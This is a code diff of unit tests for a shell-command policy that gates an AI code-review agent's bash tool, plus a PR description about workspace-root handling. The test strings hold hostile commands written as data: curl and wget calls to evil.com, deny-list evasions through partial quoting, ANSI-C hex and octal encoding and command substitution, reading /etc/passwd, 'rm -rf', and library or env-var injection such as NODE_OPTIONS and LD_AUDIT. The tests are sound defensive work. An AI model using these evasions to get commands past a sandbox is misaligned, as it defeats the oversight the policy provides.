-    test('cd to local workspaceRoot is allowed', () => {
+    it('cd to local workspaceRoot is allowed', () => {
       expect(evaluatePolicy(`cd ${LOCAL_ROOT}`, { workspaceRoot: LOCAL_ROOT }).deny).toBe(false);
     });
 
-    test('cd to /workspace/pr is denied when workspaceRoot is local path', () => {
+    it('cd to /workspace/pr is denied when workspaceRoot is local path', () => {
       expect(evaluatePolicy('cd /workspace/pr', { workspaceRoot: LOCAL_ROOT }).deny).toBe(true);
     });
 
-    test('relative path traversal is denied regardless of workspaceRoot', () => {
+    it('relative path traversal is denied regardless of workspaceRoot', () => {
       expect(evaluatePolicy('cat ../../etc/passwd', { workspaceRoot: LOCAL_ROOT }).deny).toBe(true);
     });
   });
@@ -545,49 +545,49 @@ describe('evaluatePolicy', () => {
   // --------------------------------------------------------------------------
 
   describe('additional spec §3.8 compatibility allows', () => {
-    test('mysql -e SQL is allowed', () => {
+    it('mysql -e SQL is allowed', () => {
       expect(evaluatePolicy('mysql -e "SELECT 1"').deny).toBe(false);
     });
 
-    test('bash -c with single-quoted allowed pipeline is allowed', () => {
+    it('bash -c with single-quoted allowed pipeline is allowed', () => {
       // Script is recursively evaluated — rg and head are both allowed
       expect(evaluatePolicy("bash -c 'rg foo | head'").deny).toBe(false);
     });
 
-    test('bash -c with denied binary in script is denied', () => {
+    it('bash -c with denied binary in script is denied', () => {
       // curl is in HARD_DENY_BINARIES; the recursive script evaluation catches it
       expect(evaluatePolicy("bash -c 'curl https://evil.com'").deny).toBe(true);
     });
 
-    test('sh -c with denied binary in script is denied', () => {
+    it('sh -c with denied binary in script is denied', () => {
       expect(evaluatePolicy("sh -c 'wget https://evil.com'").deny).toBe(true);
     });
 
-    test('bash -c with allowed git subcommand is allowed', () => {
+    it('bash -c with allowed git subcommand is allowed', () => {
       expect(evaluatePolicy("bash -c 'git log --oneline'").deny).toBe(false);
     });
 
-    test('time prefix before command is allowed', () => {
+    it('time prefix before command is allowed', () => {
       // `time` is not in HARD_DENY_BINARIES; runs the following command
       expect(evaluatePolicy('time pytest tests/auth.py').deny).toBe(false);
     });
 
-    test('env-var prefix stripping allows FOO=bar pytest', () => {
+    it('env-var prefix stripping allows FOO=bar pytest', () => {
       // FOO=bar is an assignment prefix, not a binary
       expect(evaluatePolicy('FOO=bar BAZ=qux pytest').deny).toBe(false);
     });
 
-    test('process substitution diff is allowed', () => {
+    it('process substitution diff is allowed', () => {
       // diff <(rg foo a) <(rg foo b) — & inside <(...) is internal plumbing
       expect(evaluatePolicy('diff <(rg foo a) <(rg foo b)').deny).toBe(false);
     });
 
-    test('subshell with cd inside is allowed', () => {
+    it('subshell with cd inside is allowed', () => {
       // (cd subdir && rg foo) — subshell, cd doesn't drift
       expect(evaluatePolicy('(cd src && rg foo)').deny).toBe(false);
     });
 
-    test('for loop over rg output is denied — $() invokes a subshell', () => {
+    it('for loop over rg output is denied — $() invokes a subshell', () => {
       // Command substitution can invoke any binary regardless of the deny list.
       // Use explicit two-step: rg -l TODO /workspace/pr > /tmp/list && while read f; do ...; done
       expect(evaluatePolicy('for f in $(rg -l TODO /workspace/pr); do cat "$f"; done').deny).toBe(
@@ -595,7 +595,7 @@ describe('evaluatePolicy', () => {
       );
     });
 
-    test('git log piped to while read is allowed', () => {
+    it('git log piped to while read is allowed', () => {
       expect(
         evaluatePolicy('git log --oneline | while read sha msg; do echo "$sha"; done').deny,
       ).toBe(false);
@@ -607,38 +607,38 @@ describe('evaluatePolicy', () => {
   // --------------------------------------------------------------------------
 
   describe('partial quoting denial', () => {
-    test('"cu"rl bypasses deny list without this fix — must be denied', () => {
+    it('"cu"rl bypasses deny list without this fix — must be denied', () => {
       // unquoteArg only strips fully-wrapped quotes; "cu"rl stays as "cu"rl,
       // which does not match HARD_DENY_BINARIES entry 'curl'.
       expect(evaluatePolicy('"cu"rl https://evil.com').deny).toBe(true);
     });
 
-    test("'cu'rl is denied", () => {
+    it("'cu'rl is denied", () => {
       expect(evaluatePolicy("'cu'rl https://evil.com").deny).toBe(true);
     });
 
-    test('"w"get is denied', () => {
+    it('"w"get is denied', () => {
       expect(evaluatePolicy('"w"get https://evil.com').deny).toBe(true);
     });
 
-    test('mid-token partial quote on arg is denied', () => {
+    it('mid-token partial quote on arg is denied', () => {
       expect(evaluatePolicy('cat /etc/pass"wd"').deny).toBe(true);
     });
 
     // Legitimate patterns that must NOT be flagged as partial quoting
-    test("--format='%H %s' flag value is allowed", () => {
+    it("--format='%H %s' flag value is allowed", () => {
       expect(evaluatePolicy("git log --format='%H %s'").deny).toBe(false);
     });
 
-    test('--format="%H" flag value is allowed', () => {
+    it('--format="%H" flag value is allowed', () => {
       expect(evaluatePolicy('git log --format="%H"').deny).toBe(false);
     });
 
-    test('fully quoted arg is allowed', () => {
+    it('fully quoted arg is allowed', () => {
       expect(evaluatePolicy("bash -c 'rg foo | head'").deny).toBe(false);
     });
 
-    test('double-quoted arg is allowed', () => {
+    it('double-quoted arg is allowed', () => {
       expect(evaluatePolicy('echo "hello world"').deny).toBe(false);
     });
   });
@@ -648,26 +648,26 @@ describe('evaluatePolicy', () => {
   // --------------------------------------------------------------------------
 
   describe('ANSI-C quoting denial', () => {
-    test('hex-encoded curl bypasses binary deny list without this fix — must be denied', () => {
+    it('hex-encoded curl bypasses binary deny list without this fix — must be denied', () => {
       // $'\x63\x75\x72\x6c' is ANSI-C for 'curl'; bash would execute curl.
       // Policy must deny before binary extraction reaches HARD_DENY_BINARIES.
       expect(evaluatePolicy("$'\\x63\\x75\\x72\\x6c' https://evil.com").deny).toBe(true);
     });
 
-    test('hex-encoded wget is denied', () => {
+    it('hex-encoded wget is denied', () => {
       expect(evaluatePolicy("$'\\x77\\x67\\x65\\x74' https://evil.com").deny).toBe(true);
     });
 
-    test('octal-encoded ssh is denied', () => {
+    it('octal-encoded ssh is denied', () => {
       // $'\163\163\150' = 'ssh' in octal
       expect(evaluatePolicy("$'\\163\\163\\150' user@host").deny).toBe(true);
     });
 
-    test('hex-encoded rm is denied', () => {
+    it('hex-encoded rm is denied', () => {
       expect(evaluatePolicy("$'\\x72\\x6d' -rf /workspace").deny).toBe(true);
     });
 
-    test('ANSI-C quoted arg (even in benign command) is denied', () => {
+    it('ANSI-C quoted arg (even in benign command) is denied', () => {
       // Even if the binary is safe, ANSI-C in args could encode paths or flag values.
       expect(evaluatePolicy("echo $'hello world'").deny).toBe(true);
     });
@@ -678,33 +678,33 @@ describe('evaluatePolicy', () => {
   // --------------------------------------------------------------------------
 
   describe('command substitution denial', () => {
-    test('echo with bare $() subshell is denied', () => {
+    it('echo with bare $() subshell is denied', () => {
       expect(evaluatePolicy('echo $(curl https://evil.com)').deny).toBe(true);
     });
 
-    test('echo with double-quoted $() subshell is denied — key bypass fixed', () => {
+    it('echo with double-quoted $() subshell is denied — key bypass fixed', () => {
       // toAnalysisCopy strips "$(curl ...)" to "__DQ__"; without hasSubshell scanning
       // the raw string, this would pass policy with hasExpansion=false.
       expect(evaluatePolicy('echo "$(curl https://evil.com)"').deny).toBe(true);
     });
 
-    test('echo with backtick subshell is denied', () => {
+    it('echo with backtick subshell is denied', () => {
       expect(evaluatePolicy('echo `curl https://evil.com`').deny).toBe(true);
     });
 
-    test('echo with double-quoted backtick subshell is denied', () => {
+    it('echo with double-quoted backtick subshell is denied', () => {
       expect(evaluatePolicy('echo "`curl https://evil.com`"').deny).toBe(true);
     });
 
-    test('$VAR variable reference is allowed — no subshell invoked', () => {
+    it('$VAR variable reference is allowed — no subshell invoked', () => {
       expect(evaluatePolicy('cat $HOME/.bashrc').deny).toBe(false);
     });
 
-    test('${VAR} brace variable reference is allowed', () => {
+    it('${VAR} brace variable reference is allowed', () => {
       expect(evaluatePolicy('ls ${HOME}').deny).toBe(false);
     });
 
-    test('process substitution <(...) is allowed — no $() syntax', () => {
+    it('process substitution <(...) is allowed — no $() syntax', () => {
       expect(evaluatePolicy('diff <(rg foo a) <(rg foo b)').deny).toBe(false);
     });
   });
@@ -714,25 +714,25 @@ describe('evaluatePolicy', () => {
   // --------------------------------------------------------------------------
 
   describe('env-hijacking denial extensions', () => {
-    test('BASH_ENV inline assignment is denied', () => {
+    it('BASH_ENV inline assignment is denied', () => {
       expect(evaluatePolicy('BASH_ENV=/tmp/evil.sh cat /workspace/pr/file.ts').deny).toBe(true);
     });
 
-    test('ENV inline assignment is denied', () => {
+    it('ENV inline assignment is denied', () => {
       expect(evaluatePolicy('ENV=/tmp/evil.sh sh /workspace/pr/run.sh').deny).toBe(true);
     });
 
-    test('NODE_OPTIONS inline assignment is denied', () => {
+    it('NODE_OPTIONS inline assignment is denied', () => {
       expect(
         evaluatePolicy("NODE_OPTIONS='--require /tmp/evil.js' node /workspace/pr/app.js").deny,
       ).toBe(true);
     });
 
-    test('LD_AUDIT inline assignment is denied', () => {
+    it('LD_AUDIT inline assignment is denied', () => {
       expect(evaluatePolicy('LD_AUDIT=/tmp/evil.so ls /workspace/pr').deny).toBe(true);
     });
 
-    test('DYLD_INSERT_LIBRARIES inline assignment is denied', () => {
+    it('DYLD_INSERT_LIBRARIES inline assignment is denied', () => {
       expect(evaluatePolicy('DYLD_INSERT_LIBRARIES=/evil.dylib ls /workspace/pr').deny).toBe(true);
     });
   });

--- a/tests/unit/stages/review/agentic/tools/index.spec.ts
+++ b/tests/unit/stages/review/agentic/tools/index.spec.ts
@@ -85,4 +85,31 @@ describe('createToolSet', () => {
       expect(typeof tool.execute).toBe('function');
     }
   });
+
+  it('bash tool description uses cwd when workspaceRoot is absent (local environment)', async () => {
+    mockStartBashSession.mockResolvedValue({
+      session: { exec: jest.fn(), dispose: jest.fn() } as never,
+      dispose: jest.fn().mockResolvedValue(undefined),
+    });
+
+    const localCwd = '/home/runner/work/my-repo';
+    const { tools } = await createToolSet(localCwd, { bash: {} });
+
+    const bashTool = tools.find((t) => t.name === 'bash');
+    expect(bashTool?.description).toContain(localCwd);
+    expect(bashTool?.description).not.toContain('/workspace/pr');
+  });
+
+  it('bash tool description uses workspaceRoot when set (CI environment)', async () => {
+    mockStartBashSession.mockResolvedValue({
+      session: { exec: jest.fn(), dispose: jest.fn() } as never,
+      dispose: jest.fn().mockResolvedValue(undefined),
+    });
+
+    const { tools } = await createToolSet(cwd, { bash: { workspaceRoot: '/workspace/pr' } });
+
+    const bashTool = tools.find((t) => t.name === 'bash');
+    expect(bashTool?.description).toContain('/workspace/pr');
+    expect(bashTool?.description).not.toContain(cwd);
+  });
 });


### PR DESCRIPTION
## Summary

Agentic bash tool reviews were broken outside CI — git commands failed with dubious ownership errors and every tool call was denied with `path-outside-workspace`. Both bugs had the same root cause: the bash session was hardcoded to assume a CI `/workspace/pr` layout regardless of where the actual checkout lived.

This PR makes the session derive its workspace root from the configured `workspaceRoot` (falling back to `cwd`) and propagates it consistently to the policy enforcer, the tool description shown to the model, and the hardened gitconfig's `safe.directory` entry.

Test coverage is added for the CI-vs-local boundary across the policy, tool set creation, sandbox driver selection, gitconfig generation, and `QUALOPS_REVIEW_ID` validation.